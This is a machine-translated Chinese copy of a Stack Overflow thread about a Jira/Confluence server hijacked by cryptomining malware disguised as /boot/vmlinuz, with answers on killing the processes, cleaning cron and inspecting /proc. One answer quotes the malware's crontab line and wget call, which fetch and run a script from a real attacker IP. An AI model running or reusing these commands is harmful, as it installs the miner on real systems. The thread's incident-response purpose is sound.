vmlinuz 进程在 100% CPU 上运行

【问题标题】:vmlinuz process runs on 100% CPUvmlinuz 进程在 100% CPU 上运行
【发布时间】:2019-09-06 04:05:41
【问题描述】:

我在 VPS 上运行 Jira 和 Confluence 实例(和 nginx 反向代理)。目前,由于某种原因,我无法启动合流,我认为这是其他原因造成的。

我查看了进程列表:

confluence 用户运行 /boot/vmlinuz 进程,它吃掉了 CPU。如果我kill -9 这个过程会在几秒钟后重新开始。

重启VPS后:

  1. Confluence 和 Jira 自动启动。
  2. Confluence 正常运行了几秒钟,然后某些东西终止了进程。 Jira 进程仍在运行。
  3. /boot/vmlinuz 进程启动。

我已经从自动启动中删除了 Confluence,但这没关系。

所以我的问题:

  • 这是什么/boot/vmlinuz 进程?我从来没有见过这个。 (是的,我知道,vmlinuz 是内核)
  • 为什么一遍又一遍地启动并在 100% 的 CPU 上运行?
  • 我应该怎么做才能恢复正常行为?我可以启动 Confluence 吗?

谢谢大家的回答

更新

它是由黑客攻击引起的。如果您找到/tmp/seasame 文件,则您的服务器已被感染。它使用 cron 来下载这个文件。我已经删除了/tmp 文件夹中的文件,杀死了所有进程,禁用了 confluence 用户的 cron,并更新了 Confluence。

【问题讨论】:

    标签: linux linux-kernel debian jira confluence


    【解决方案1】:

    如您所见,这是恶意软件 — 实际上是 cryptojacking malware,旨在将您的 CPU 用作 cryptocurrency miner

    您的服务器很可能由于 Confluence 漏洞而受到威胁(请参阅 this reddit post 的第一个答案),但是 应该知道这不是它唯一的传播方式 — 怎么强调都不过分。事实上,我的一台服务器也被入侵了,虽然它没有运行 Confluence(我什至不知道这个软件……),而所谓的/boot/vmlinuz 进程是由root 运行的。

    另外,请注意此恶意软件会尝试使用known_hosts 和 SSH 密钥通过 SSH 传播,因此您应该检查您从该服务器访问的其他计算机。

    最后,reddit 帖子链接到此恶意软件的this comprehensive description,值得一读。

    注意:不要忘记向 IP 的 ISP 滥用电子邮件地址发送报告。

    【讨论】:

      【解决方案2】:

      我有同样的问题,它被黑了,病毒脚本在/tmp,从命令“top”中找到脚本名称(无意义的字母,“fcbk6hj”的名称是我的。)并杀死进程(可能是3个进程)

      根 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl 根 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl 根 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot

      全部杀掉并删除/tmp/prot,杀掉/boot/vmlinuz的进程,CPU回来了。

      我发现病毒自动将脚本下载到/tmp,我的方法是mv wgetak to other name。

      病毒行为: wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

      发现下面的任务是用crontab写的,删掉即可: */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame

      【讨论】:

      • 然后重新开始。您也必须从 crontab 中清理,否则它会再次自行下载。
      • 非常感谢,我刚好遇到了这个问题。
      • 在我的 crontab 中没有 seasame 行,但 /boot/vmlinuz 仍然重新开始。为什么?我已将 confluence 用户添加到 /etc/cron.deny 并在 ubuntu 上安装了 nod32 防病毒软件。防病毒软件阻止了 seasame 文件的创建。
      【解决方案3】:

      从系统和 crontab 中删除它之后,将 confluence 用户添加到 /etc/cron.deny 可能是个好主意(至少现在是这样)。

      之后:

      $ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

      【讨论】:

        【解决方案4】:

        我同时也遇到了同样的问题,可能是confluence bug。我只是杀死了confluence进程,它就没事了。

        【讨论】:

        • 感谢您的回答。这可能是一个 Confluence 漏洞。
        【解决方案5】:

        您的服务器似乎被黑了。 请仔细查看进程列表。 例如运行ps auxc 并查看进程二进制源。

        您可以使用 rkhunter 之类的工具来扫描您的服务器,但一般情况下,您应该在一开始就以 confluence 用户的身份杀死所有已被午餐的东西,扫描您的服务器/帐户,升级您的 confluence(在大多数情况下,用户确定攻击源) ,并在您的融合中查找其他帐户等。

        您是否想查看该过程中的内容,请查看 /proc,例如在ls -la /proc/996。你也会在那里看到源二进制文件。您还可以使用午餐 strace -ff -p 996 查看正在执行的进程或 cat /proc/996/exe | strings 查看二进制文件有哪些字符串。这可能是某种僵尸网络部分、矿工等。

        【讨论】:

        • 谢谢!是的,它被黑客入侵了。我成功杀死了所有属于“病毒”的进程,并找到了脚本。目前我试图阻止回来(使用cronjob自行下载)。有很多事情要做。当我摆脱它时,我会更新问题。
        猜你喜欢
        • 1970-01-01
        • 1970-01-01
        • 1970-01-01
        • 2014-07-05
        • 2012-03-10
        • 1970-01-01
        • 1970-01-01
        • 2015-08-21
        • 2021-07-31
        相关资源
        最近更新 更多
        热门标签
        Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode